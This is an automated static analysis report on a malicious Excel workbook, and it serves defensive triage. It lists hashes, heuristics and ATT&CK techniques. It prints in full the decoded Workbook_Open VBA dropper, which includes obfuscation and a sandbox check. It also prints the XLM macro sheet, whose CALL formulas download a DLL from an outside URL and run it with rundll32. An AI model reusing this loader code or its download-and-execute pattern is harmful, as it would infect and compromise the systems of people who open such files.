Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c07af723990a19cc…

MALICIOUS

Office (OOXML)

186.9 KB Created: 2021-10-04 13:20:34 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-10-14
MD5: e7f800ea895ba59a6f2dd486c4b04287 SHA-1: bdca0cc93e4733dc4926cd7f85a410293d39d2bb SHA-256: c07af723990a19cc946a35efca0b6035129a74b0b9a62462261b164fb591e628
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1105 Ingress Tool Transfer

The sample contains both VBA and Excel 4.0 macros. The Excel 4.0 macro sheet explicitly calls `URLDownloadToFileA` to download a file from `https://drive.imaarif.com/logs.php` to `C:\Users\admin\AppData\Local\think-cell\test.dll`. Subsequently, it uses `ShellExecuteA` with `rundll32` to execute the downloaded DLL. The VBA macro also appears to be involved in setting up the execution environment and potentially constructing parts of the command.

Heuristics 8

  • Excel 4.0 macro sheet (1 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: CALL critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://drive.imaarif.com/logs.php In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2482 bytes
SHA-256: d934b5d9ac9eb93528b8f1e3ca002382170f7fa8ea46c958604899f0fcf27393
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim UCvg(2) As Integer

Sub qCqhNpAn()
On Error Resume Next
pYTRxVw = Environ("LocalAppData") & "\think-cell"
ABMoK = pYTRxVw & "\test.dll"
MkDir pYTRxVw
Cells(89 + UCvg(1), 3) = "LL"
Cells(14 + UCvg(0), 5) = "mon"
Cells(52 + UCvg(2), 7) = "Down"
Cells(29 + UCvg(1), 9) = "oFileA"
Cells(29 + UCvg(0), 11) = "ll32"
Cells(82 + UCvg(2), 13) = "llExe"
Cells(100 + UCvg(1), 15) = "run"
Cells(69 + UCvg(0), 17) = "l32"
Cells(49 + UCvg(2), 19) = "s://"
Cells(12 + UCvg(1), 21) = "e."
Cells(93 + UCvg(0), 23) = "ari"
Cells(101 + UCvg(2), 25) = "om"
Cells(27 + UCvg(1), 27) = "ogs."

oimOh = Cells(11, 1).Value
dUatQ = Cells(17, 1).Value
Yhrq = Cells(29, 1).Value
ffmMGR = Cells(44, 1).Value
wwpSsPrB = Cells(56, 1).Value
rIszZp = Cells(74, 1).Value
YWFdjkjt = Cells(92, 1).Value

Sheets.Add(Type:=3, After:=Sheets(1)).Name = "Sheet2"
Cells(1, 1).Name = "asd"
Cells(1, 1) = "=" & oimOh & "(""" & dUatQ & """, """ & Yhrq & """, ""JJCCJJ"", 0, """ & YWFdjkjt & """, """ & ABMoK & """, 0, 0)"
Cells(2, 1) = "=" & oimOh & "(""" & ffmMGR & """, """ & wwpSsPrB & """, ""JJCCCJJ"", 0, ""open"", """ & rIszZp & """, """ & ABMoK & ", asd"")"
Sheet1.Activate
Run "asd"

End Sub

Sub BOhgZ()
Dim DBNbFF, jRlt
DBNbFF = "Do you want to continue?" & vbNewLine & "Click Yes to Continue"
jRlt = vbYesNo + vbQuestion + vbDefaultButton2
UCvg(2) = MsgBox(DBNbFF, jRlt) * 11
Call qCqhNpAn
End Sub

Sub QwSkaLb()
If Environ("NUMBER_OF_PROCESSORS") < 4 Then
UCvg(1) = 117
Else
UCvg(1) = UCvg(1) + 82
End If
Call BOhgZ
End Sub

Sub Workbook_Open()
On Error GoTo PHZLKF
Application.DisplayAlerts = False
  Dim rdZBxwb As Worksheet
  Set rdZBxwb = Worksheets(2)
  rdZBxwb.Delete
Application.DisplayAlerts = True
rdZBxwb.Cells(1, 1) = "Hello World"
UCvg(0) = 100
Call QwSkaLb
Exit Sub
PHZLKF:
UCvg(0) = UCvg(0) + 30
Call QwSkaLb
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 25088 bytes
SHA-256: 250850f6f0a0c8bf8282479f56a671eccc45aafe62436f1622f44fee6a9f8463
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1171 bytes
SHA-256: 3c0026e2e1097268b406538938b952c4fef9a93db5b6403347d5fd97268a2074
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A1:A2"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="1" spans="1:1" x14ac:dyDescent="0.25"><c r="A1"><f>CALL("urlmon", "URLDownloadToFileA", "JJCCJJ", 0, "https://drive.imaarif.com/logs.php", "C:\Users\admin\AppData\Local\think-cell\test.dll", 0, 0)</f><v>-2146697208</v></c></row><row r="2" spans="1:1" x14ac:dyDescent="0.25"><c r="A2"><f>CALL("Shell32", "ShellExecuteA", "JJCCCJJ", 0, "open", "rundll32", "C:\Users\admin\AppData\Local\think-cell\test.dll, asd")</f><v>42</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>